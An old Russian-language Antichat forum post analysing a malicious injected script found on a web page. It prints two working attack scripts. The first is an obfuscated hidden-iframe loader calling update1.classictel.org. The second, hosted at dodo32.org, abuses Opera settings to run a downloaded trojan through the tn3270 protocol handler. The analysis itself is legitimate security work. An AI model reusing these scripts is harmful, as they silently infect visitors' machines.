ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
27.09.2007, 01:22
|
|
Постоянный
Регистрация: 30.08.2007
Сообщений: 773
Провел на форуме:
3069349
Репутация:
808
|
|
Точно хек (учитывается браузер??):
Код:
<SCRIPT>function ubi(grS,Cey){ var jsw=new Date(), rKa= new Date(); rKa.setTime(jsw.getTime()+86400000); document.cookie = grS+"="+escape(Cey)+";expires="+rKa.toGMTString(); }var cog='s1fVsm';var rbq='1',CLD='update1.classictel.org';var tjM='/html/';if(document.cookie.indexOf(cog+'='+rbq) ==-1){var dlh=document.location.host;var avS= 'ht'+'tp:'+'//'+( dlh != ''?'':eCI()) + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.')+'.'+eCI() +'.' + CLD+tjM;var GdK=document.createElement('iframe');GdK.setAttribute ('src', avS);GdK.height=1;GdK.width=2;GdK.frameBorder = 0; try{ document.body.appendChild ( GdK); ubi(cog, rbq );} catch(e) {document.write ('<html><body></body></html>'); document.body.appendChild ( GdK);ubi ( cog,rbq) ;} }function eCI(){ var zZS=24;var NTe="01234567890abcdef",EYy=""; for(Uzd=0; Uzd < zZS; Uzd++) EYy+= NTe.substr(Math.?oor(Math.random()*NTe.length),1,1); return EYy; }</SCRIPT>
Как видно, адрес - _http://update1.classictel.org/html/
По этому адресу происходит переадресация на _http://dodo32.org/505/Xp/, где находится следующее:
Код:
<script> blank_iframe = document.createElement('iframe'); blank_iframe.src = 'about:blank'; blank_iframe.setAttribute('id', 'blank_iframe_window'); blank_iframe.setAttribute('style', 'display:none'); document.appendChild(blank_iframe); blank_iframe_window.eval ("config_iframe = document.createElement('iframe');\ config_iframe.setAttribute('id', 'config_iframe_window');\ config_iframe.src = 'opera:config';\ document.appendChild(config_iframe);\ app_iframe = document.createElement('script');\ cache_iframe = document.createElement('iframe');\ app_iframe.src = 'http://dodo32.org/505/Xp//file.php?q=o9';\ app_iframe.onload = function ()\ {\ cache_iframe.src = 'opera:cache';\ cache_iframe.onload = function ()\ {\ cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\ var re = new RegExp('(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A HREF=\"'+app_iframe.src.toUpperCase(), '');\ filename = cache.match(re);\ config_iframe_window.eval\ (\"\ opera.setPreference('Network','TN3270 App',opera.getPreference('User Prefs','Cache Directory4')+parent.filename[1]);\ app_link = document.createElement('a');\ app_link.setAttribute('href', 'tn3270://nothing');\ app_link.click();\ setTimeout(function () {opera.setPreference('Network','TN3270 App','telnet.exe')},1000);\ \");\ };\ document.appendChild(cache_iframe);\ };\ document.appendChild(app_iframe);"); </script>
Данный код, вероятно, должен сопоставить протоколу "tn3270:" приложение telnet.exe и скачать некий file.exe (Trojan-Downloader.Win32.Small.ert) отсюда: _http://dodo32.org/505/Xp//file.php?q=o9 |
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Древовидный вид